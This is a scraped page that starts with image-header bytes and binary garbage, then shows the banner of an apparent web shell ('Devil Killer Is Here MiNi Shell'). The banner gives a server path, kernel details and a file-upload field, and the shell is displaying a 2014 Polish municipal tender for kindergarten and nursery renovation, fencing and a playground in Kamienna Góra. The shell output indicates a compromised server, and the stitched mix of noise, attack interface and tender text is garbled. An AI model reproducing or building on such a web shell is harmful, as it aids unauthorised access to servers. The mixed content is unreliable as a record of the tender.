JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140627/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20140627/215800-N-2014.html

<p class="kh_header"><b>Kamienna Góra: Remont pomieszczeń w budynku Przedszkola Publicznego nr 1 i Żłobka Miejskiego oraz przebudowa ogrodzenia terenu wraz z budową placu zabaw przy ul. Spacerowej w Kamiennej Górze</b><br>
<b>Numer ogłoszenia: 215800 - 2014; data zamieszczenia: 27.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Kamienna Góra , Plac Grunwaldzki 1, 58-400 Kamienna Góra, woj. dolnośląskie, tel. 075 6455124.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kamiennagora.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont pomieszczeń w budynku Przedszkola Publicznego nr 1 i Żłobka Miejskiego oraz przebudowa ogrodzenia terenu wraz z budową placu zabaw przy ul. Spacerowej w Kamiennej Górze.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest remont pomieszczeń w budynku Przedszkola Publicznego nr 1 i Żłobka Miejskiego oraz przebudowa ogrodzenia terenu wraz z budową placu zabaw przy ul. Spacerowej w Kamiennej Górze, w zakresie określonym w niżej wymienionych częściach. Wykonawca może złożyć ofertę na dowolną ilość części zamówienia.

Część I zamówienia

Przedmiotem niniejszego zamówienia jest remont pomieszczeń w budynku Przedszkola Publicznego nr 1 i Żłobka Miejskiego przy ul. Spacerowej w Kamiennej Górze.

Terenem inwestycji jest kompleks budynków Przedszkola Publicznego nr 1 i Żłobka Miejskiego zlokalizowany przy ul. Spacerowej w Kamiennej Górze. Istniejące budynki posiadają dwie kondygnacje naziemne, budynek przedszkola jest podpiwniczony. Obiekty powstały w końcu lat sześćdziesiątych XX w. Wokół budynku urządzona jest kompletna infrastruktura techniczna tj. dojazd, dojścia, przyłącza kanalizacyjne, energetyczne, wodociągowe, telekomunikacyjne. Obiekty wraz z przyległym terenem zieleni (nawierzchnia trawiasta) pełnią funkcję budynków przedszkolnych i żłobkowych związanych z opieką nad dziećmi od lat 3.
Pomieszczenia w budynkach są przystosowane do swej funkcji i w części odnowione poprzez wymianę podłóg, tynków ścian, urządzeń sanitarnych i pozostałych instalacji. Pozostają w budynkach jednak pomieszczenia utrzymywane w stanie nie polepszonym od czasu budowy. Stan części instalacji elektrycznej nie odpowiada wymaganiom nowych norm a zabezpieczenia ppoż i warunki ewakuacji budzą zastrzeżenia instytucji kontrolujących w tym Państwowej Straży Pożarnej.

Dla poprawy stanu budynków oraz unowocześnienia bazy edukacyjnej budynków przedszkola i żłobka planuje się przeprowadzenie remontu obiektów. 
W szczególności zakres robót remontowo-budowlanych będzie obejmował:
1.dostosowanie budynku przedszkola do obowiązujących przepisów w zakresie zabezpieczenia przeciwpożarowego w tym:
-wykonanie instalacji oddymiania dróg ewakuacyjnych (klatek schodowych) z montażem central oddymiania i ich zasilania
-wykonanie stalowej konstrukcji wsporczej dla wykucia otworu w stropodachu i montażu klapy oddymiającej z siłownikami
-montaż klap oddymiających (dostawa i montaż 1szt. klapy i dostosowanie istniejących okien do celów oddymiania)
-uszczelnienie pokrycia dachowego po montażu klapy oddymiającej (obróbki blacharskie, uzupełnienia pokrycia z papy)
-montaż napędu drzwiowego z zasilaniem w drzwiach napowietrzających (istniejące)
-budowa instalacji oświetlenia awaryjnego

UWAGA: Po wykonaniu prac montażowych klapy oddymiającej i stalowej konstrukcji wsporczej oraz montażu przewodów zasilających instalacji oddymiającej należy uzupełnić wszystkie miejsca uszkodzonych tynków wewnętrznych wraz z malowaniem ścian i sufitów w odpowiednich kolorach oraz w sposób zapewniający estetyczny wygląd (w tym malowanie ścian i sufitu klatki schodowej o pow. ok. 40m2).

2.odnowienie części pomieszczeń w budynku Żłobka Miejskiego poprzez wykonanie następujących prac remontowych:
-wymianę zniszczonych podłóg poprzez ułożenie płytek ceramicznych, 
-odnowienie ścian poprzez zeskrobanie starej farby na ścianach i sufitach, przetarcie tynków i malowanie pomieszczeń,
-wykonanie okładzin ściennych z płytek ceramicznych
-wymianę drzwi wewnętrznych
-wymianę wewnętrznej instalacji elektrycznej w remontowanych pomieszczeniach,
-wymianę balustrad schodowych i odnowienie klatek schodowych.

Szczegółowy zakres robót remontowych w pomieszczeniach Żłobka Miejskiego:
Pomieszczenie nr 1 (klatka schodowa)
-odnowienie ścian i sufitów z malowaniem i wykonanie lamperii do wys. 1,60m z akrylowych tynków dekoracyjnych (tynk mozaikowy)
-wymiana 4szt. drzwi wewnętrznych
-wykonanie okładzin biegów i spoczników schodowych z płytek ceramicznych z cokolikami, przygotowanie podłoża przez nakłucie istniejącej posadzki lastrykowej
-wymiana balustrady schodowej i poręczy
-wymiana istniejącej instalacji oświetleniowej z montażem nowych opraw świetlówkowych


Pomieszczenie nr 2 (wózkownia)
-miejscowa naprawa pęknięcia ściany (przemurowanie miejsc zarysowania)
-odnowienie ścian i sufitów z malowaniem i wykonanie lamperii do wys. 1,60m z akrylowych tynków dekoracyjnych (tynk mozaikowy)
-wykonanie posadzki z płytek ceramicznych z cokolikami z przygotowaniem podłoża (nakłucie istniejącej posadzki lastrykowej)
-wymiana istniejącej instalacji oświetleniowej z montażem nowych opraw świetlówkowych

Pomieszczenie nr 3 (klatka schodowa)
-odnowienie ścian i sufitów z malowaniem i wykonanie lamperii do wys. 1,60m z akrylowych tynków dekoracyjnych (tynk mozaikowy)
-wymiana 1szt. drzwi wewnętrznych
-wykonanie okładzin biegów i spoczników schodowych z płytek ceramicznych z cokolikami, przygotowanie podłoża przez nakłucie istniejącej posadzki lastrykowej
-wymiana balustrady schodowej i poręczy z wykonaniem zastawy schodowej
-wymiana istniejącej instalacji oświetleniowej z montażem nowych opraw świetlówkowych

Pomieszczenie nr 4 (klatka schodowa)
-odnowienie ścian i sufitów z malowaniem i wykonanie lamperii do wys. 1,60m z akrylowych tynków dekoracyjnych (tynk mozaikowy)
-wymiana 1szt. drzwi wewnętrznych z poszerzeniem otworu i montażem nadproży prefabrykowanych
-wykonanie okładzin biegów i spoczników schodowych z płytek ceramicznych z cokolikami, przygotowanie podłoża przez nakłucie istniejącej posadzki lastrykowej
-wymiana balustrady schodowej i poręczy z wykonaniem zastawy schodowej
-wymiana istniejącej instalacji oświetleniowej z montażem nowych opraw świetlówkowych

Pomieszczenie nr 5 (pomieszczenie socjalno-sanitarne dla personelu)
-odnowienie ścian i sufitów z malowaniem i wykonanie lamperii do wys. 1,60m z akrylowych tynków dekoracyjnych (tynk mozaikowy) w pom. szatni i okładzin z płytek ceramicznych do wys. 2,0 m w pom. przedsionka, WC i natrysku
-wykonanie posadzki z płytek ceramicznych z cokolikami z przygotowaniem podłoża (rozebranie starej posadzki z PCV i wyrównanie podłoża) 
-wymiana 3 szt. drzwi wewnętrznych w tym 2szt. z poszerzeniem otworu i montażem nadproży prefabrykowanych (drzwi z otworami wentylacyjnymi)
-wymiana urządzeń sanitarnych wraz z podłączeniami (muszla, umywalka, brodzik z kotarą) 
-wymiana baterii umywalkowej i natryskowej
-wymiana istniejącej instalacji oświetleniowej i gniazdek z montażem nowych opraw świetlówkowych i żarowych


Pomieszczenie nr 6 (korytarz)
-odnowienie ścian i sufitów z malowaniem i wykonanie lamperii do wys. 1,60m z akrylowych tynków dekoracyjnych (tynk mozaikowy) 
-wykonanie posadzki z płytek ceramicznych z cokolikami z przygotowaniem podłoża przez nakłucie istniejącej posadzki lastrykowej
-wymiana 5 szt. drzwi wewnętrznych w tym 1szt. z poszerzeniem otworu i montażem nadproży prefabrykowanych 1 szt. z okienkiem podawczym
-wymiana istniejącej instalacji oświetleniowej z montażem nowych opraw świetlówkowych


Wszystkie prace należy wykonać zgodnie z dokumentacją projektową oraz specyfikacjami technicznymi wykonania i odbioru robót.
Poza pracami określonymi powyżej do Wykonawcy należeć będą wszystkie inne obowiązki określone w Części III. Istotne postanowienia umowy.
Wykonawca ma obowiązek zapoznania się w sposób bardzo szczegółowy z dokumentacją projektową, specyfikacjami technicznymi wykonania i odbioru robót, warunkami umowy oraz przedmiarami robót. Wykonawca ma obowiązek wyjaśnić z Zamawiającym wszystkie wątpliwości w stosunku do zakresu zawartego w przywołanych dokumentach, przed złożeniem ofert. Po złożeniu oferty, Zamawiający będzie uważał, że Wykonawca nie ma wątpliwości i uwag w stosunku do zakresu ujętego w specyfikacji. 
Zamawiający informuje, że w okresie od 1 sierpnia do 31 sierpnia Przedszkole Publiczne i Żłobek Miejski będą nieczynne i w tym czasie roboty mogą być prowadzone bez przeszkód. Prowadzenie prac poza tym okresem należy wykonywać w uzgodnieniu z Dyrekcją przedszkola i żłobka.
Zamawiający wymaga, aby Wykonawca udzielił gwarancji wynoszącej minimum 36 miesięcy na wykonane i odebrane roboty.
Integralną część opisu przedmiotu zamówienia stanowi:
1.	dokumentacja projektowa,
2.	specyfikacja techniczna wykonania i odbioru robót,
3.	przedmiar robót.


Część II zamówienia


Przedmiotem niniejszego zamówienia jest przebudowa ogrodzenia terenu Przedszkola Publicznego nr 1 i Żłobka Miejskiego przy ul. Spacerowej w Kamiennej Górze.

Projektuje się przebudowę istniejącego ogrodzenia w części po istniejącej trasie - wzdłuż ul. Browarowej i Krótkiej a w części przesunięte do granicy działki wg ewidencji gruntów - wzdłuż ul. Spacerowej. Wysokość projektowanego ogrodzenia ok. 170 cm.
Dodatkowo zakłada się budowę części nowego ogrodzenia w okolicy budynku trafostacji i nasadzenie wokół tego ogrodzenia krzewów żywopłotu. Krzewy do nasadzeń należy pozyskać z istniejącego żywopłotu przy rozbieranym ogrodzeniu (lokalizację wskaże Zamawiający).  
Zakres robót przy przebudowie ogrodzenia obejmuje:
1.rozbiórkę istniejącego ogrodzenia z siatki w ramkach z kątowników, z siatki rozciągniętej na stalowych słupkach i z paneli ogrodzeniowych na słupkach
2.rozbiórkę całkowitą lub miejscową betonowego cokołu ogrodzenia wraz z wywozem i utylizacją materiału rozbiórkowego w tym:
-całkowitą rozbiórkę cokołu o szer. 20cm wzdłuż ul. Spacerowej z uporządkowaniem terenu (dł. ok. 122m)
-miejscową rozbiórkę cokołu o szer. 20 cm wzdłuż ul. Krótkiej w miejscach montażu nowych słupków stalowych i zabetonowanie miejsc po wycięciu starych słupków (długość ok. 35m)
-miejscową rozbiórkę cokołu o szer. 30 cm wzdłuż ul. Browarowej w miejscach montażu nowych słupków stalowych i zabetonowanie miejsc po wycięciu starych słupków (długość ok. 160m)
3.wytyczenie trasy nowego ogrodzenia z rozmieszczeniem bramy i furtek
4.montaż ogrodzenia panelowego wraz z montażem bramy i 3 furtek w tym:
-zabetonowanie nowych słupków w wykutych gniazdach istniejącego cokołu betonowego wzdłuż ul. Browarowej i Krótkiej (dł. ok. 195m)
-montaż ogrodzenia bez cokołu (słupki zabetonowane w gruncie) wzdłuż ul. Spacerowej i od pl. Browarowego (dł. ok. 151m)
5.przesadzenie krzewów żywopłotu
6.prace porządkowe polegające na wyrównaniu terenu wzdłuż ogrodzenia

Elementy rozebranego ogrodzenia, które będą w dobrym stanie technicznym należy przewieźć we wskazane przez Zamawiającego miejsce na terenie miasta Kamiennej Góry (odległość do 2 km) 
Projektuje się nowe ogrodzenie systemowe w postaci gotowych, prefabrykowanych paneli ogrodzeniowych zamontowanych na słupkach stalowych zabetonowanych w gruncie.
Panele ogrodzeniowe powinny być wykonane w postaci układu zgrzewanych prętów stalowych o śr. min 5mm, ocynkowanych ogniowo z powłoką z PCV, ze wzmocnieniami w postaci 4 przetłoczeń poziomych. 
Słupki do ogrodzeń panelowych mają być wykonane ze stalowych profili zamkniętych (kwadratowe lub prostokątne), stalowe, ocynkowane ogniowo i powlekane PCV. Wysokość słupków dostosowana do wysokości paneli ogrodzeniowych. Słupki zabetonowane w gruncie.
W ciągu ogrodzenia zakłada się zamontowanie 3 szt. furtek otwieranych o szer. 1,0m i wysokości min. 1,50m, zamontowanych na słupkach ogrodzeniowych. Furtki należy wykonać z materiałów takich jak reszta elementów ogrodzenia a konstrukcja furtek ma być dostosowana do systemu ogrodzeń panelowych.  
Na wjeździe na posesję przedszkola należy zamontować bramę wjazdową dwuskrzydłową o szerokości 3,50 m i wysokości min. 1,50m (wysokość ma być taka sama jak wysokość furtki). Bramę należy zamontować na słupkach ogrodzeniowych i wykonać z materiałów takich jak reszta elementów ogrodzenia o konstrukcji dostosowanej do systemu ogrodzeń panelowych


Przykładowe ogrodzenie panelowe
Panel ogrodzeniowy wysokość 176cm serii SOLID powlekany PCV w technologii DUAL-TECH (ocynk ogniowy+ powłoka w kolorze z palety RAL). Panel ogrodzeniowy SOLID posiada następujące parametry:
-szerokości 2505mm
-wysokości 1760mm
-4 wzmocniena w postaci przetłoczeń poziomych
-średnica drutów poziomych o5mm
-średnica drutów pionowych o5mm
-odstęp pomiędzy drutami pionowymi wynosi 5cm

Słupek profilowy do ogrodzeń panelowych o przekroju prostokątnym. Słupki produkowane są na bazie profili zamkniętych o zwiększonej wytrzymałości na obciążenia. Słupek stalowy, ocynkowany ogniowo i powlekany PCV.

Furtka standardowa przeznaczona do użytku przydomowego i przemysłowego, wysokość 1,5metra, szerokość 1metr . Wykonana z najwyższej jakości materiałów i komponentów. Projekt furtki jest bardzo uniwersalny, wizualnie i funkcjonalnie furtka pasuje do ogrodzeń panelowych, siatki ogrodzeniowej, a nawet ogrodzeń betonowych. W skład kompletnego zestawu wchodzą:
-skrzydło furtki
-2 słupki 
-komplet zawiasów
-zamek z klamką

Brama standardowa dwuskrzydłowa o szerokości 3,5 metra i wysokości 1,5m ocynkowana i powlekana PCV. Wykonana z elementów stalowych. Szerokość 3,5 metra jest najbardziej popularną szerokością dla tego typu bram. Zaprojektowana do uniwersalnego użytku w ogrodzeniach działek, domów jednorodzinnych i placów przemysłowych. 
Bramy dwuskrzydłowa nadają się do zamknięcia wjazdów do domów jednorodzinnych, obiektów przemysłowych, hal, magazynów oraz placów i parkingów. Projekt oferowanej bramy jest bardzo uniwersalny, wizualnie i funkcjonalnie pasuje do ogrodzeń panelowych, siatki ogrodzeniowej, a nawet ogrodzeń betonowych. 
W skład kompletnego zestawu (kompletnej bramy) wchodzą:
-skrzydła 2 sztuki , każde 1,75m szerokości
-2 słupki 
-komplet zawiasów
-zamek 
Wszystkie prace należy wykonać zgodnie z dokumentacją projektową oraz specyfikacjami technicznymi wykonania i odbioru robót.
Poza pracami określonymi powyżej do Wykonawcy należeć będą wszystkie inne obowiązki określone w Części III. Istotne postanowienia umowy.
Wykonawca ma obowiązek zapoznania się w sposób bardzo szczegółowy z dokumentacją projektową, specyfikacjami technicznymi wykonania i odbioru robót, przedmiarem robót oraz warunkami umowy. Wykonawca ma obowiązek wyjaśnić z Zamawiającym wszystkie wątpliwości w stosunku do zakresu zawartego w przywołanych dokumentach, przed złożeniem ofert. Po złożeniu oferty, Zamawiający będzie uważał, że Wykonawca nie ma wątpliwości i uwag w stosunku do zakresu ujętego w specyfikacji. 
Zamawiający informuje, że w okresie od 1 sierpnia do 31 sierpnia Przedszkole Publiczne i Żłobek Miejski będą nieczynne i w tym czasie roboty mogą być prowadzone bez przeszkód. Prowadzenie prac poza tym okresem należy wykonywać w uzgodnieniu z Dyrekcją przedszkola i żłobka.
Zamawiający wymaga, aby Wykonawca udzielił gwarancji wynoszącej minimum 36 miesięcy na wykonane i odebrane roboty.
Integralną część opisu przedmiotu zamówienia stanowi:
1.	dokumentacja projektowa,
2.	specyfikacja techniczna wykonania i odbioru robót,
3.	przedmiar robót.

Część III zamówienia

Przedmiotem zamówienia jest montaż nowych urządzeń zabawowych placu zabaw na terenie wokół budynku Przedszkola Publicznego nr 1 przy ul. Spacerowej w Kamiennej Górze oraz wykonanie prac przygotowania terenu, polegających na demontażu starych urządzeń (piaskownica w obudowie drewnianej, drabinki z rur stalowych - 2 szt.) i miejscowej niwelacji terenu po rozebranych urządzeniach i wysianiu w tym miejscu trawy. Zakłada się montaż urządzeń wykonanych z drewna (bale, krawędziaki, okrąglaki itp.), materiałów drewnopodobnych (sklejki wodoodporne laminowane, płyty HPL itp.) z uzupełnieniami stalowymi odpowiednio zabezpieczonymi.

Wymagane urządzenia placu zabaw 
Przykładowe rozmieszczenia urządzeń pokazano na załączniku graficznym - powierzchnia terenu do wykorzystania ok. 800m2.
Poniżej przedstawiono wykaz wymaganych urządzeń wraz z opisem oraz przybliżone wymiary urządzeń w rzucie (wymiary dotyczą ich obrysu bez stref bezpieczeństwa):
1.Zestaw zabawowy duży z zadaszeniami, wieżami, drabinką, pomostami, zjeżdżalniami, przeplotnią, elementami do wspinania i przechodzenia, wejściami itp. o wym. ok. 12,0x12,0m -1szt.
2.Zestaw sprawnościowy z drabinkami, elementami do wspinania, podciągania, przechodzenia itp. o wym. ok. 4,0x4,0m. - 1szt.
3.Średni zestaw zabawowy typu samochód z przyczepą, pociąg o wym. ok. 6,0x1,0m - 1szt.
4.Średni zestaw zabawowy z pomostami, wieżami, pochylniami itp. o wym. ok. 10,0x3,0m - 1szt.
5.Huśtawka wagowa typu ważka - 1szt.
6.Huśtawka wahadłowa podwójna - 2szt.
7.Altana biesiadna zadaszona z miejscami do siedzenia o wym. ok. 2,0x3,0m
8.Piaskownica podwójna o wym. ok. 6,0x3,0m wypełniona piaskiem wraz z przykryciem (plandeka) zabezpieczającym przez dostępem zwierząt 
9.Ławka bez oparcia o wym. ok. 1,5x0,5m - 8szt.

Wymagania dotyczące urządzeń zabawowych:
1.	Belki nośne mocujące elementy placu zabaw w podłożu winny być wykonywane z drewna spełniającego wymagania normy EN 350 -2 w formie belek bezrdzeniowych, okrągłe o średnicy O 100 - 120 mm lub o przekroju kwadratowym i prostokątnym, zabezpieczonych impregnatami olejowymi lub innymi ciśnieniowo, 
2.	Belki drewniane mają być mocowane 8-10 cm ponad ziemią na stalowych kotwach. Kotwy mocujące należy utwierdzić w fundamencie o głębokości 70 cm z betonu B20
3.	Pozostałe elementy drewniane w tym podesty należy wykonać z drewna akacjowego lub z drewna innych gatunków w formie belek bezrdzeniowych, o przekroju okrągłym, kwadratowym lub zabezpieczonych impregnatami olejowymi. 
4.	Szczeble barierek, daszki, można wykonać ze sklejki wodoodpornej pomalowanej farbami odpornymi na warunki atmosferyczne. 
5.	Dopuszcza się wykonanie innych pomocniczych elementów urządzeń zabawowych ze sklejki wodoodpornej laminowanej, płyt HPL itp.
6.	Wszystkie elementy stalowe (wraz z podstawami w gruncie) powinny być cynkowane ogniowo, a dopiero po ocynkowaniu malowane proszkowo. 
7.	Ślizgi zjeżdżalni należy wykonać z blachy ze stali nierdzewnej lub odpowiednich tworzyw sztucznych. 
8.	Wszystkie stosowane śruby winny być ocynkowane . 
9.	Materiały, substancje, śruby, łańcuchy, sprężyny i inne połączenia oraz elementy zabezpieczające wykorzystane przy produkcji i montażu maja posiadać wymagane atesty i dopuszczenia. 
10.	Wszystkie elementy drewniane maja być wyszlifowane
11.	Należy pamiętać, aby przy urządzeniach wykonanych z okrąglaków, były zastosowane dystanse zapobiegające zakleszczeniu odzieży (guzików)

Wszystkie urządzenia muszą posiadać certyfikaty zgodności z obowiązującymi normami potwierdzone przez jednostki akredytowane przy Polskim Centrum Akredytacji. Wyroby posiadać mają tabliczki znamionowe określające wykonawcę, spełnianie norm bezpieczeństwa (PN-EN 1176-1-6) oraz dane telefoniczne i adresowe.

Wszystkie prace należy wykonać zgodnie z dokumentacją projektową oraz specyfikacjami technicznymi wykonania i odbioru robót.
Poza pracami określonymi powyżej do Wykonawcy należeć będą wszystkie inne obowiązki określone w Części III. Istotne postanowienia umowy.
Wykonawca ma obowiązek zapoznania się w sposób bardzo szczegółowy z dokumentacją projektową, specyfikacjami technicznymi wykonania i odbioru robót, przedmiarem robót oraz warunkami umowy. Wykonawca ma obowiązek wyjaśnić z Zamawiającym wszystkie wątpliwości w stosunku do zakresu zawartego w przywołanych dokumentach, przed złożeniem ofert. Po złożeniu oferty, Zamawiający będzie uważał, że Wykonawca nie ma wątpliwości i uwag w stosunku do zakresu ujętego w specyfikacji. 
Zamawiający informuje, że w okresie od 1 sierpnia do 31 sierpnia Przedszkole Publiczne i Żłobek Miejski będą nieczynne i w tym czasie roboty mogą być prowadzone bez przeszkód. Prowadzenie prac poza tym okresem należy wykonywać w uzgodnieniu z Dyrekcją przedszkola i żłobka.
Zamawiający wymaga, aby Wykonawca udzielił gwarancji wynoszącej minimum 36 miesięcy na wykonane i odebrane roboty.
Integralną część opisu przedmiotu zamówienia stanowi:
1.	dokumentacja projektowa,
2.	specyfikacja techniczna wykonania i odbioru robót,
3.	przedmiar robót..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Dla Części I zamówienia Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 Ustawy do wysokości 20 % wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.40.00.00-1, 45.31.00.00-3, 45.34.20.00-6, 37.53.52.00-9, 45.11.27.23-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część I, II i III: Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część I: Wykonawca winien wykazać, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizował co najmniej 2 zadania polegające na wykonaniu robót ogólnobudowlanych wykończeniowych wewnątrz obiektu, zawierających m.in. w swoim zakresie remont ścian wewnętrznych z malowaniem, układanie płytek ceramicznych na ścianach i podłogach, wymianę instalacji elektrycznej, o wartości minimum 50 000,00 zł (słownie: pięćdziesiąt tysięcy złotych) każde zadanie.
